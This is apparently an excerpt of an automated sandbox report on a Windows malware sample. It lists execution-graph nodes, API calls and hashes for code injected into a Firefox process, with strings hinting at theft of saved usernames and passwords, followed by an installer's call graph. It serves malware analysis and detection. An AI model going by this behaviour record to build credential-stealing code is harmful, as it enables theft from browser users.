5075->5071 5076->5074 5077->5071 5081 244a227b2c5 5077->5081 5083 244a227b412 LdrLoadDll 5077->5083 5078->5071 5082 244a227b412 LdrLoadDll 5078->5082 5079->5071 5080->5071 5081->5071 5084 244a227b412 LdrLoadDll 5081->5084 5082->5071 5083->5081 5084->5071 5090 244a227b642 5085->5090 5087 244a227ba11 5087->4897 5088 244a227b997 5088->5087 5089 244a227b412 LdrLoadDll 5088->5089 5089->5087 5092 244a227b674 5090->5092 5091 244a227b6e2 5091->5088 5092->5091 5093 244a22794e2 LdrLoadDll 5092->5093 5094 244a227b71d 5093->5094 5094->5091 5097 244a227b783 5094->5097 5099 244a227ca32 5094->5099 5095 244a227b801 5095->5088 5097->5095 5098 244a227b982 LdrLoadDll 5097->5098 5098->5095 5100 244a227ca5d 5099->5100 5101 244a227ca47 5099->5101 5100->5097 5102 244a227b412 LdrLoadDll 5101->5102 5102->5100 5104 244a2279cfe 5103->5104 5105 244a227b412 LdrLoadDll 5104->5105 5114 244a2279e56 5104->5114 5106 244a2279d6f 5105->5106 5107 244a2279a82 LdrLoadDll 5106->5107 5106->5114 5108 244a2279d92 5107->5108 5109 244a227b412 LdrLoadDll 5108->5109 5108->5114 5110 244a2279e29 5109->5110 5111 244a227b412 LdrLoadDll 5110->5111 5110->5114 5112 244a2279e7c 5111->5112 5113 244a227b412 LdrLoadDll 5112->5113 5112->5114 5113->5114 5114->4809 5116 244a2274b3e 5115->5116 5122 244a2274c69 5116->5122 5131 244a22749c2 5116->5131 5118 244a2274c3f 5119 244a22749c2 LdrLoadDll 5118->5119 5118->5122 5120 244a2274c54 5119->5120 5121 244a22749c2 LdrLoadDll 5120->5121 5120->5122 5121->5122 5122->4925 5124 244a2279ac7 5123->5124 5124->5124 5125 244a227b412 LdrLoadDll 5124->5125 5126 244a2279b0d 5125->5126 5127 244a227b412 LdrLoadDll 5126->5127 5128 244a2279b36 5127->5128 5129 244a227b412 LdrLoadDll 5128->5129 5130 244a2279b91 5128->5130 5129->5130 5130->4928 5132 244a2274a1c 5131->5132 5133 244a227b412 LdrLoadDll 5132->5133 5134 244a2274a35 5133->5134 5134->5118 5136 244a227980d 5135->5136 5137 244a227b412 LdrLoadDll 5136->5137 5138 244a2279900 5137->5138 5138->4944 5140 244a2279672 LdrLoadDll 5139->5140 5141 244a227a7ba 5139->5141 5140->5141 5141->4946 5292 244a227d4e3 5293 244a227d4ed 5292->5293 5296 244a2273f72 5293->5296 5295 244a227d510 5297 244a2273f91 5296->5297 5300 244a2273faa 5296->5300 5301 244a22730f2 5297->5301 5300->5295 5302 244a2273109 5301->5302 5306 244a22731af 5301->5306 5303 244a2273012 LdrLoadDll 5302->5303 5304 244a2273118 5303->5304 5305 244a227ba52 LdrLoadDll 5304->5305 5305->5306 5306->5295 5539 244a2273363 5540 244a2273367 5539->5540 5541 244a227b412 LdrLoadDll 5540->5541 5542 244a22733a0 5540->5542 5541->5542 5307 244a22775e0 5308 244a22775e3 5307->5308 5313 244a2277492 5308->5313 5310 244a2277698 5317 244a22784d2 5310->5317 5314 244a22774be 5313->5314 5321 244a2276b72 5314->5321 5316 244a22774cb 5316->5310 5318 244a227850d 5317->5318 5320 244a2278081 5317->5320 5319 244a227b412 LdrLoadDll 5318->5319 5319->5320 5322 244a2276be4 5321->5322 5323 244a22794e2 LdrLoadDll 5322->5323 5324 244a2276c18 5323->5324 5325 244a227b412 LdrLoadDll 5324->5325 5326 244a2276c35 5325->5326 5326->5316 5543 244a227c758 5544 244a227c762 5543->5544 5545 244a227c770 5544->5545 5549 244a227c77c 5544->5549 5546 244a2279f12 LdrLoadDll 5545->5546 5547 244a227c775 5546->5547 5548 244a227c8fa 5549->5548 5550 244a22780a2 LdrLoadDll 5549->5550 5551 244a227c7dc 5550->5551 5551->5548 5552 244a2274362 LdrLoadDll 5551->5552 5553 244a227c7ec 5552->5553 5553->5548 5554 244a227c80d 5553->5554 5556 244a227c81a 5553->5556 5557 244a227c815 5553->5557 5555 244a227a8a2 LdrLoadDll 5554->5555 5555->5557 5556->5557 5558 244a22734b2 LdrLoadDll 5556->5558 5557->5548 5561 244a2276812 3 API calls 5557->5561 5559 244a227c835 5558->5559 5560 244a227a8a2 LdrLoadDll 5559->5560 5562 244a227c83d 5560->5562 5563 244a227c8d9 5561->5563 5564 244a227c894 5562->5564 5568 244a227c85f 5562->5568 5565 244a227b412 LdrLoadDll 5563->5565 5567 244a2273372 LdrLoadDll 5564->5567 5566 244a227c8f6 ExitProcess 5565->5566 5567->5557 5569 244a22794e2 LdrLoadDll 5568->5569 5570 244a227c872 5569->5570

                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                Function 00000244A22764B2 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 288COMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000021.00000002.4636191248.00000244A21B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00000244A21B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_33_2_244a21b0000_firefox.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: NamesPrivateProfileSection
                                                                                                                                                                                                                                • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                                                                                                • API String ID: 709140578-2058692283
                                                                                                                                                                                                                                • Opcode ID: 2634d713e03c4249ea3ef125dc13a9036903a6f93b935f15d9626ba978a7b125
                                                                                                                                                                                                                                • Instruction ID: 669b748ccd03c7e85e5884b1ded8f4c967cae589fb3d22fb1793da468f9d4dc9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2634d713e03c4249ea3ef125dc13a9036903a6f93b935f15d9626ba978a7b125
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 94A1B371A1C7588FEB18EF68D4587EEB7E1FB94304F104A2DE84ADB282DF7085458785
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00000244A227AD02 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 48 244a227ad02-244a227ad26 49 244a227b38d-244a227b39d 48->49 50 244a227ad2c-244a227ad30 48->50 50->49 51 244a227ad36-244a227ad70 50->51 52 244a227ad72-244a227ad76 51->52 53 244a227ad8f 51->53 52->53 54 244a227ad78-244a227ad7c 52->54 55 244a227ad96 53->55 56 244a227ad84-244a227ad88 54->56 57 244a227ad7e-244a227ad82 54->57 58 244a227ad9b-244a227ad9f 55->58 56->58 59 244a227ad8a-244a227ad8d 56->59 57->55 60 244a227adc9-244a227addb 58->60 61 244a227ada1-244a227adc7 call 244a227b412 58->61 59->58 65 244a227ae48 60->65 66 244a227addd-244a227ae02 60->66 61->60 61->65 69 244a227ae4a-244a227ae70 65->69 67 244a227ae04-244a227ae0b 66->67 68 244a227ae71-244a227ae78 66->68 70 244a227ae36-244a227ae40 67->70 71 244a227ae0d-244a227ae30 call 244a227b412 67->71 72 244a227ae7a-244a227aea3 call 244a227b412 68->72 73 244a227aea5-244a227aeac 68->73 70->65 77 244a227ae42-244a227ae43 70->77 71->70 72->65 72->73 74 244a227aee0-244a227af28 NtCreateFile call 244a227ac42 73->74 75 244a227aeae-244a227aeda call 244a227b412 73->75 84 244a227af2d-244a227af2f 74->84 75->65 75->74 77->65 84->65 85 244a227af35-244a227af3d 84->85 85->65 86 244a227af43-244a227af46 85->86 87 244a227af48-244a227af51 86->87 88 244a227af56-244a227af5d 86->88 87->69 89 244a227af92-244a227afbc 88->89 90 244a227af5f-244a227af88 call 244a227b412 88->90 95 244a227afc2-244a227afc5 89->95 96 244a227b37e-244a227b388 89->96 90->65 97 244a227af8e-244a227af8f 90->97 98 244a227afcb-244a227afce 95->98 99 244a227b0d4-244a227b0e1 95->99 96->65 97->89 100 244a227afd0-244a227afd7 98->100 101 244a227b02e-244a227b031 98->101 99->69 103 244a227afd9-244a227b002 call 244a227b412 100->103 104 244a227b008-244a227b029 100->104 106 244a227b037-244a227b042 101->106 107 244a227b0e6-244a227b0e9 101->107 103->65 103->104 111 244a227b0b9-244a227b0ca 104->111 112 244a227b044-244a227b06d call 244a227b412 106->112 113 244a227b073-244a227b076 106->113 109 244a227b188-244a227b18b 107->109 110 244a227b0ef-244a227b0f6 107->110 115 244a227b209-244a227b20c 109->115 116 244a227b18d-244a227b194 109->116 118 244a227b0f8-244a227b121 call 244a227b412 110->118 119 244a227b127-244a227b13b call 244a227c992 110->119 111->99 112->65 112->113 113->65 114 244a227b07c-244a227b086 113->114 114->65 121 244a227b08c-244a227b0b6 114->121 125 244a227b294-244a227b297 115->125 126 244a227b212-244a227b219 115->126 122 244a227b196-244a227b1bf call 244a227b412 116->122 123 244a227b1c5-244a227b204 116->123 118->65 118->119 119->65 140 244a227b141-244a227b183 119->140 121->111 122->96 122->123 146 244a227b364-244a227b379 123->146 125->65 129 244a227b29d-244a227b2a4 125->129 132 244a227b21b-244a227b244 call 244a227b412 126->132 133 244a227b24a-244a227b28f 126->133 135 244a227b2a6-244a227b2c6 call 244a227b412 129->135 136 244a227b2cc-244a227b2d3 129->136 132->96 132->133 133->146 135->136 144 244a227b2fb-244a227b305 136->144 145 244a227b2d5-244a227b2f5 call 244a227b412 136->145 140->69 144->96 150 244a227b307-244a227b30e 144->150 145->144 146->69 150->96 153 244a227b310-244a227b356 150->153 153->146
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000021.00000002.4636191248.00000244A21B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00000244A21B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_33_2_244a21b0000_firefox.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                • String ID: `
                                                                                                                                                                                                                                • API String ID: 823142352-2679148245
                                                                                                                                                                                                                                • Opcode ID: d77668096b18891c3cee839e8581402439719b55f2a783575009bfdf60917714
                                                                                                                                                                                                                                • Instruction ID: abea967ae8edb6d6d4ce2724c1d9422bd7716d4d704eda4380c0be83c93b2b92
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d77668096b18891c3cee839e8581402439719b55f2a783575009bfdf60917714
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E02280B1A1CA198FDB98EF28C4A97ADF7E1FB58305F50062EE45ED7290DB309441DB81
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00000244A227C762 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 156 244a227c762-244a227c76e call 244a227d802 159 244a227c77c-244a227c784 call 244a227d802 156->159 160 244a227c770-244a227c77b call 244a2279f12 156->160 165 244a227c78f-244a227c797 call 244a227d802 159->165 166 244a227c786-244a227c787 159->166 169 244a227c79d-244a227c7ad call 244a22781a2 165->169 170 244a227c904-244a227c90a 165->170 166->165 173 244a227c8ff-244a227c900 169->173 174 244a227c7b3-244a227c7ba 169->174 173->170 174->173 175 244a227c7c0-244a227c7de call 244a227c942 call 244a22780a2 174->175 175->173 180 244a227c7e4-244a227c7ee call 244a2274362 175->180 180->173 183 244a227c7f4-244a227c802 180->183 184 244a227c8a4-244a227c8ac 183->184 185 244a227c808-244a227c80b 183->185 188 244a227c8ae-244a227c8b5 call 244a227c742 184->188 189 244a227c8fa-244a227c8fb 184->189 186 244a227c80d-244a227c815 call 244a227a8a2 185->186 187 244a227c81a-244a227c81d 185->187 186->184 187->184 191 244a227c823-244a227c826 187->191 188->189 197 244a227c8b7-244a227c8c9 call 244a227c742 188->197 189->173 191->184 194 244a227c828-244a227c82b 191->194 194->184 196 244a227c82d-244a227c847 call 244a22734b2 call 244a227a8a2 194->196 207 244a227c894-244a227c89f call 244a2275302 call 244a2273372 196->207 208 244a227c849-244a227c854 call 244a227c742 196->208 197->189 202 244a227c8cb-244a227c8f8 call 244a2276812 call 244a227b412 ExitProcess 197->202 207->184 208->207 216 244a227c856-244a227c85d 208->216 216->207 217 244a227c85f-244a227c893 call 244a22794e2 call 244a227c942 216->217
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000021.00000002.4636191248.00000244A21B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00000244A21B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_33_2_244a21b0000_firefox.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: d1e992e853f5319a5e44a433e2df559e407adb8b6d37870ff715de64f33b6fb3
                                                                                                                                                                                                                                • Instruction ID: 75f50441f727178a7e6f7d6525e7fcd617a1d8bbc0a3be88f22c0ad8d6a2a2e3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d1e992e853f5319a5e44a433e2df559e407adb8b6d37870ff715de64f33b6fb3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 834189B229C6244AFBA5B738446D7E9E2D1FBC5308FE40C259C0ADE393DE24D841A252
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00000244A22794E2 Relevance: 1.6, APIs: 1, Instructions: 53libraryloaderCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000021.00000002.4636191248.00000244A21B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00000244A21B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_33_2_244a21b0000_firefox.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Load
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                                                                                                                • Opcode ID: e15ec73648a025ceb5b3a15fe8fd4bd4c46c9f3de2ee994074a413c48c56ecde
                                                                                                                                                                                                                                • Instruction ID: 26a18f2e753bf41f1b66b113e86482d7980f59922610c38e1220973b791bc6dc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e15ec73648a025ceb5b3a15fe8fd4bd4c46c9f3de2ee994074a413c48c56ecde
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E01D87214CB184BE754F734D8ED7A7F3D5FBD8308F50092AAC4ECA290EA34D6409642
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                Execution Coverage:18.4%
                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                Total number of Nodes:1346
                                                                                                                                                                                                                                Total number of Limit Nodes:21
                                                                                                                                                                                                                                execution_graph 2913 401941 2914 401943 2913->2914 2919 402da6 2914->2919 2920 402db2 2919->2920 2961 40657a 2920->2961 2923 401948 2925 405c49 2923->2925 3003 405f14 2925->3003 2928 405c71 DeleteFileW 2959 401951 2928->2959 2929 405c88 2930 405da8 2929->2930 3017 40653d lstrcpynW 2929->3017 2930->2959 3046 406873 FindFirstFileW 2930->3046 2932 405cae 2933 405cc1 2932->2933 2934 405cb4 lstrcatW 2932->2934 3018 405e58 lstrlenW 2933->3018 2936 405cc7 2934->2936 2938 405cd7 lstrcatW 2936->2938 2940 405ce2 lstrlenW FindFirstFileW 2936->2940 2938->2940 2940->2930 2952 405d04 2940->2952 2943 405d8b FindNextFileW 2947 405da1 FindClose 2943->2947 2943->2952 2944 405c01 5 API calls 2946 405de3 2944->2946 2948 405de7 2946->2948 2949 405dfd 2946->2949 2947->2930 2953 40559f 24 API calls 2948->2953 2948->2959 2951 40559f 24 API calls 2949->2951 2951->2959 2952->2943 2954 405c49 60 API calls 2952->2954 2956 40559f 24 API calls 2952->2956 3022 40653d lstrcpynW 2952->3022 3023 405c01 2952->3023 3031 40559f 2952->3031 3042 4062fd MoveFileExW 2952->3042 2955 405df4 2953->2955 2954->2952 2957 4062fd 36 API calls 2955->2957 2956->2943 2957->2959 2965 406587 2961->2965 2962 4067aa 2963 402dd3 2962->2963 2994 40653d lstrcpynW 2962->2994 2963->2923 2978 4067c4 2963->2978 2965->2962 2966 406778 lstrlenW 2965->2966 2969 40657a 10 API calls 2965->2969 2970 40668f GetSystemDirectoryW 2965->2970 2972 4066a2 GetWindowsDirectoryW 2965->2972 2973 406719 lstrcatW 2965->2973 2974 40657a 10 API calls 2965->2974 2975 4067c4 5 API calls 2965->2975 2976 4066d1 SHGetSpecialFolderLocation 2965->2976 2987 40640b 2965->2987 2992 406484 wsprintfW 2965->2992 2993 40653d lstrcpynW 2965->2993 2966->2965 2969->2966 2970->2965 2972->2965 2973->2965 2974->2965 2975->2965 2976->2965 2977 4066e9 SHGetPathFromIDListW CoTaskMemFree 2976->2977 2977->2965 2984 4067d1 2978->2984 2979 406847 2980 40684c CharPrevW 2979->2980 2982 40686d 2979->2982 2980->2979 2981 40683a CharNextW 2981->2979 2981->2984 2982->2923 2984->2979 2984->2981 2985 406826 CharNextW 2984->2985 2986 406835 CharNextW 2984->2986 2999 405e39 2984->2999 2985->2984 2986->2981 2995 4063aa 2987->2995 2990 40646f 2990->2965 2991 40643f RegQueryValueExW RegCloseKey 2991->2990 2992->2965 2993->2965 2994->2963 2996 4063b9 2995->2996 2997 4063c2 RegOpenKeyExW 2996->2997 2998 4063bd 2996->2998 2997->2998 2998->2990 2998->2991 3000 405e3f 2999->3000 3001 405e55 3000->3001 3002 405e46 CharNextW 3000->3002 3001->2984 3002->3000 3052 40653d lstrcpynW 3003->3052 3005 405f25 3053 405eb7 CharNextW CharNextW 3005->3053 3008 405c69 3008->2928 3008->2929 3009 4067c4 5 API calls 3014 405f3b 3009->3014 3010 405f6c lstrlenW 3011 405f77 3010->3011 3010->3014 3013 405e0c 3 API calls 3011->3013 3012 406873 2 API calls 3012->3014 3015 405f7c GetFileAttributesW 3013->3015 3014->3008 3014->3010 3014->3012 3016 405e58 2 API calls 3014->3016 3015->3008 3016->3010 3017->2932 3019 405e66 3018->3019 3020 405e78 3019->3020 3021 405e6c CharPrevW 3019->3021 3020->2936 3021->3019 3021->3020 3022->2952 3059 406008 GetFileAttributesW 3023->3059 3026 405c2e 3026->2952 3027 405c24 DeleteFileW 3029 405c2a 3027->3029 3028 405c1c RemoveDirectoryW 3028->3029 3029->3026 3030 405c3a SetFileAttributesW 3029->3030 3030->3026 3032 4055ba 3031->3032 3041 40565c 3031->3041 3033 4055d6 lstrlenW 3032->3033 3034 40657a 17 API calls 3032->3034 3035 4055e4 lstrlenW 3033->3035 3036 4055ff 3033->3036 3034->3033 3037 4055f6 lstrcatW 3035->3037 3035->3041 3038 405612 3036->3038 3039 405605 SetWindowTextW 3036->3039 3037->3036 3040 405618 SendMessageW SendMessageW SendMessageW 3038->3040 3038->3041 3039->3038 3040->3041 3041->2952 3043 40631e 3042->3043 3044 406311 3042->3044 3043->2952 3062 406183 3044->3062 3047 405dcd 3046->3047 3048 406889 FindClose 3046->3048 3047->2959 3049 405e0c lstrlenW CharPrevW 3047->3049 3048->3047 3050 405dd7 3049->3050 3051 405e28 lstrcatW 3049->3051 3050->2944 3051->3050 3052->3005 3054 405ed4 3053->3054 3057 405ee6 3053->3057 3056 405ee1 CharNextW 3054->3056 3054->3057 3055 405f0a 3055->3008 3055->3009 3056->3055 3057->3055 3058 405e39 CharNextW 3057->3058 3058->3057 3060 405c0d 3059->3060 3061 40601a SetFileAttributesW 3059->3061 3060->3026 3060->3027 3060->3028 3061->3060 3063 4061b3 3062->3063 3064 4061d9 GetShortPathNameW 3062->3064 3089 40602d GetFileAttributesW CreateFileW 3063->3089 3066 4062f8 3064->3066 3067 4061ee 3064->3067 3066->3043 3067->3066 3069 4061f6 wsprintfA 3067->3069 3068 4061bd CloseHandle GetShortPathNameW 3068->3066 3070 4061d1 3068->3070 3071 40657a 17 API calls 3069->3071 3070->3064 3070->3066 3072 40621e 3071->3072 3090 40602d GetFileAttributesW CreateFileW 3072->3090 3074 40622b 3074->3066 3075 40623a GetFileSize GlobalAlloc 3074->3075 3076 4062f1 CloseHandle 3075->3076 3077 40625c 3075->3077 3076->3066 3091 4060b0 ReadFile 3077->3091 3082 40627b lstrcpyA 3085 40629d 3082->3085 3083 40628f 3084 405f92 4 API calls 3083->3084 3084->3085 3086 4062d4 SetFilePointer 3085->3086 3098 4060df WriteFile 3086->3098 3089->3068 3090->3074 3092 4060ce 3091->3092 3092->3076 3093 405f92 lstrlenA 3092->3093 3094 405fd3 lstrlenA 3093->3094 3095 405fdb 3094->3095 3096 405fac lstrcmpiA 3094->3096 3095->3082 3095->3083 3096->3095 3097 405fca CharNextA 3096->3097 3097->3094 3099 4060fd GlobalFree 3098->3099 3099->3076 3100 4015c1 3101 402da6 17 API calls 3100->3101 3102 4015c8 3101->3102 3103 405eb7 4 API calls 3102->3103 3104 4015d1 3103->3104 3105 401631 3104->3105 3106 405e39 CharNextW 3104->3106 3116 401617 GetFileAttributesW 3104->3116 3118 4015fa 3104->3118 3124 405b08 3104->3124 3132 405aeb CreateDirectoryW 3104->3132 3107 401663 3105->3107 3108 401636 3105->3108 3106->3104 3110 401423 24 API calls 3107->3110 3120 401423 3108->3120 3117 40165b 3110->3117 3115 40164a SetCurrentDirectoryW 3115->3117 3116->3104 3118->3104 3127 405a6e CreateDirectoryW 3118->3127 3121 40559f 24 API calls 3120->3121 3122 401431 3121->3122 3123 40653d lstrcpynW 3122->3123 3123->3115 3135 40690a GetModuleHandleA 3124->3135 3128 405abb 3127->3128 3129 405abf GetLastError 3127->3129 3128->3118 3129->3128 3130 405ace SetFileSecurityW 3129->3130 3130->3128 3131 405ae4 GetLastError 3130->3131 3131->3128 3133 405afb 3132->3133 3134 405aff GetLastError 3132->3134 3133->3104 3134->3133 3136 406930 GetProcAddress 3135->3136 3137 406926 3135->3137 3140 405b0f 3136->3140 3141 40689a GetSystemDirectoryW 3137->3141 3139 40692c 3139->3136 3139->3140 3140->3104 3142 4068bc wsprintfW LoadLibraryExW 3141->3142 3142->3139 3599 404943 3600 404953 3599->3600 3601 404979 3599->3601 3602 404499 18 API calls 3600->3602 3603 404500 8 API calls 3601->3603 3605 404960 SetDlgItemTextW 3602->3605 3604 404985 3603->3604 3605->3601 3606 401c43 3607 402d84 17 API calls 3606->3607 3608 401c4a 3607->3608 3609 402d84 17 API calls 3608->3609 3610 401c57 3609->3610 3611 401c6c 3610->3611 3612 402da6 17 API calls 3610->3612 3613 402da6 17 API calls 3611->3613 3617 401c7c 3611->3617 3612->3611 3613->3617 3614 401cd3 3616 402da6 17 API calls 3614->3616 3615 401c87 3618 402d84 17 API calls 3615->3618 3620 401cd8 3616->3620 3617->3614 3617->3615 3619 401c8c 3618->3619 3621 402d84 17 API calls 3619->3621 3622 402da6 17 API calls 3620->3622 3623 401c98 3621->3623 3624 401ce1 FindWindowExW 3622->3624 3625 401cc3 SendMessageW 3623->3625 3626 401ca5 SendMessageTimeoutW 3623->3626 3627 401d03 3624->3627 3625->3627 3626->3627 3628 4028c4 3629 4028ca 3628->3629 3630 4028d2 FindClose 3629->3630 3631 402c2a 3629->3631 3630->3631 3635 4016cc 3636 402da6 17 API calls 3635->3636 3637 4016d2 GetFullPathNameW 3636->3637 3638 4016ec 3637->3638 3644 40170e 3637->3644 3641 406873 2 API calls 3638->3641 3638->3644 3639 401723 GetShortPathNameW 3640 402c2a 3639->3640 3642 4016fe 3641->3642 3642->3644 3645 40653d lstrcpynW 3642->3645 3644->3639 3644->3640 3645->3644 3646 401e4e GetDC 3647 402d84 17 API calls 3646->3647 3648 401e60 GetDeviceCaps MulDiv ReleaseDC 3647->3648 3649 402d84 17 API calls 3648->3649 3650 401e91 3649->3650 3651 40657a 17 API calls 3650->3651 3652 401ece CreateFontIndirectW 3651->3652 3653 402638 3652->3653 3654 4045cf lstrcpynW lstrlenW 3655 402950 3656 402da6 17 API calls 3655->3656 3658 40295c 3656->3658 3657 402972 3660 406008 2 API calls 3657->3660 3658->3657 3659 402da6 17 API calls 3658->3659 3659->3657 3661 402978 3660->3661 3683 40602d GetFileAttributesW CreateFileW 3661->3683 3663 402985 3664 402a3b 3663->3664 3665 4029a0 GlobalAlloc 3663->3665 3666 402a23 3663->3666 3667 402a42 DeleteFileW 3664->3667 3668 402a55 3664->3668 3665->3666 3669 4029b9 3665->3669 3670 4032b4 31 API calls 3666->3670 3667->3668 3684 4034e5 SetFilePointer 3669->3684 3672 402a30 CloseHandle 3670->3672 3672->3664 3673 4029bf 3674 4034cf ReadFile 3673->3674 3675 4029c8 GlobalAlloc 3674->3675 3676 4029d8 3675->3676 3677 402a0c 3675->3677 3678 4032b4 31 API calls 3676->3678 3679 4060df WriteFile 3677->3679 3682 4029e5 3678->3682 3680 402a18 GlobalFree 3679->3680 3680->3666 3681 402a03 GlobalFree 3681->3677 3682->3681 3683->3663 3684->3673 3685 401956 3686 402da6 17 API calls 3685->3686 3687 40195d lstrlenW 3686->3687 3688 402638 3687->3688 3689 4014d7 3690 402d84 17 API calls 3689->3690 3691 4014dd Sleep 3690->3691 3693 402c2a 3691->3693 3694 404658 3695 404670 3694->3695 3701 40478a 3694->3701 3702 404499 18 API calls 3695->3702 3696 4047f4 3697 4048be 3696->3697 3698 4047fe GetDlgItem 3696->3698 3703 404500 8 API calls 3697->3703 3699 404818 3698->3699 3700 40487f 3698->3700 3699->3700 3707 40483e SendMessageW LoadCursorW SetCursor 3699->3707 3700->3697 3708 404891 3700->3708 3701->3696 3701->3697 3704 4047c5 GetDlgItem SendMessageW 3701->3704 3705 4046d7 3702->3705 3706 4048b9 3703->3706 3727 4044bb KiUserCallbackDispatcher 3704->3727 3710 404499 18 API calls 3705->3710 3731 404907 3707->3731 3713 4048a7 3708->3713 3714 404897 SendMessageW 3708->3714 3711 4046e4 CheckDlgButton 3710->3711 3725 4044bb KiUserCallbackDispatcher 3711->3725 3713->3706 3718 4048ad SendMessageW 3713->3718 3714->3713 3715 4047ef 3728 4048e3 3715->3728 3718->3706 3720 404702 GetDlgItem 3726 4044ce SendMessageW 3720->3726 3722 404718 SendMessageW 3723 404735 GetSysColor 3722->3723 3724 40473e SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 3722->3724 3723->3724 3724->3706 3725->3720 3726->3722 3727->3715 3729 4048f1 3728->3729 3730 4048f6 SendMessageW 3728->3730 3729->3730 3730->3696 3734 405b63 ShellExecuteExW 3731->3734 3733 40486d LoadCursorW SetCursor 3733->3700 3734->3733 3735 4020d8 3736 4020ea 3735->3736 3737 40219c 3735->3737 3738 402da6 17 API calls 3736->3738 3739 401423 24 API calls 3737->3739 3740 4020f1 3738->3740 3746 4022f6 3739->3746 3741 402da6 17 API calls 3740->3741 3742 4020fa 3741->3742 3743 402110 LoadLibraryExW 3742->3743 3744 402102 GetModuleHandleW 3742->3744 3743->3737 3745 402121 3743->3745 3744->3743 3744->3745 3755 406979 3745->3755 3749 402132 3752 401423 24 API calls 3749->3752 3753 402142 3749->3753 3750 40216b 3751 40559f 24 API calls 3750->3751 3751->3753 3752->3753 3753->3746 3754 40218e FreeLibrary 3753->3754 3754->3746 3760 40655f WideCharToMultiByte 3755->3760 3757 406996 3758 40699d GetProcAddress 3757->3758 3759 40212c 3757->3759 3758->3759 3759->3749 3759->3750 3760->3757 3761 402b59 3762 402b60 3761->3762 3763 402bab 3761->3763 3766 402d84 17 API calls 3762->3766 3769 402ba9 3762->3769 3764 40690a 5 API calls 3763->3764 3765 402bb2 3764->3765 3767 402da6 17 API calls 3765->3767 3768 402b6e 3766->3768 3770 402bbb 3767->3770 3771 402d84 17 API calls 3768->3771 3770->3769 3772 402bbf IIDFromString 3770->3772 3774 402b7a 3771->3774 3772->3769 3773 402bce 3772->3773 3773->3769 3779 40653d lstrcpynW 3773->3779 3778 406484 wsprintfW 3774->3778 3777 402beb CoTaskMemFree 3777->3769 3778->3769 3779->3777 3780 40175c 3781 402da6 17 API calls 3780->3781 3782 401763 3781->3782 3783 40605c 2 API calls 3782->3783 3784 40176a 3783->3784 3784->3784 3785 401d5d 3786 402d84 17 API calls 3785->3786 3787 401d6e SetWindowLongW 3786->3787 3788 402c2a 3787->3788 3530 4056de 3531 405888 3530->3531 3532 4056ff GetDlgItem GetDlgItem GetDlgItem 3530->3532 3534 405891 GetDlgItem CreateThread FindCloseChangeNotification 3531->3534 3535 4058b9 3531->3535 3576 4044ce SendMessageW 3532->3576 3534->3535 3579 405672 5 API calls 3534->3579 3537 4058e4 3535->3537 3540 4058d0 ShowWindow 